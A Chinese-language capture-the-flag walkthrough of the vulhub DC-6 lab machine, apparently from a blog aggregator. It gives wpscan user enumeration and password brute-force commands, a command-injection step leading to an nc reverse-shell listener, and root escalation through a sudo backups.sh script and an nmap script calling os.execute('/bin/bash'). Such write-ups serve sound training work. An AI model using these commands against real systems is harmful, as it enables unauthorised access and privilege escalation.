当前位置: 首页 > news >正文

[vulhub靶机通关]DC-6(命令执行_nmap提权)

news 2025/11/7 14:20:32

信息收集

主机探测

端口扫描

扫描网站结构

是cms wordpress

用自带的wpscan 扫描网站的用户名

wpscan -url http://wordy -e u

在靶机页面有提示

我们复制过来 同时将得到的用户名复制

cat /usr/share/wordlists/rockyou.txt| grep k01 > password1.txt


wpscan --url http://wordy -U user1.txt -P password1.txt

扫出来一个账号 mark helpdesk01

扫描网站

dirb  http://wordy

漏洞利用

寻找了一番 找到一个可以进行命令执行的页面 用bp进行抓包

修改 绕过前端验证

用nc反弹一个shell给kali

在kali上开启监听

nc -lvvp 5678

在home/mark目录下找到了 graham的密码

我们试着su能不能su进去

成功

提权

sudo -l 提示backups.sh无命令可以执行

我们在后面追加/bin/bash获得jens的shell

切换到 jens

sudo -u jens ./backups.sh

查看jens的权限

发现nmap有root权限

写一个shell

echo 'os.execute("/bin/bash")' > getshell

os.execute()相当于system()

用nmap执行

sudo nmap --script=getshell

找到flag

http://www.dtcms.com/a/578903.html

相关文章:

  • 大数据分析网站建设网站公司哪个好
  • 海口网站建设王道下拉棒建一个小型的购物网站服务器一年要多少钱
  • 做票据业务的p2p网站获客牛全网营销
  • 建设网站基础怎样提高网站的权重
  • 网站开发文档word网站建设中搭建页面结构
  • 用网站做平台网站的侧边栏怎么做
  • 电商网站运营流程方便面网络营销推广方案
  • fluent管道欧拉壁面水膜仿真
  • 基于spring-boot-admin实现对应用、数据库、nginx等监控
  • 台州公司做网站学校让做网站做完怎么交
  • 回过头来重新对C语言进行深度学习(一)
  • 网站多久才能做起来三明市建设局网站
  • 《Effective Java》解读第9条:try-with-resources 优先于 try-finally
  • redis 大key问题整理
  • 如何解决 pip install --target 安装成功但脚本不在 PATH(无法调用)问题
  • 深圳企业集团网站建设一个人制作网站
  • 网站外链建设原则中国最大建筑招聘网
  • 李沐深度学习笔记D2-矩阵计算
  • 做期货关注网站淄博网站排名优化报价
  • 创新的南昌网站建设住房和城乡建设部网站城市稽查
  • 张家口建设局网站网站规划的内容
  • 花生壳做网站速度古典asp网站源码
  • leetcode 2208 将数组和减半的最少操作次数
  • 免费的外贸网站怎么搭建个人网站电脑做服务器
  • php网站开发软件是什么烟台芝罘区住房建设局网站
  • AI代码编辑器 - AI代码框架 - AIDevFlow - 使用手册
  • 镇江网站建设哪家好阳江市企业网站优化
  • 教程网站后台密码杭州网站建设unohacha
  • 系统运维Day01_SSH服务
  • 长沙企业网站建设优度wordpress英文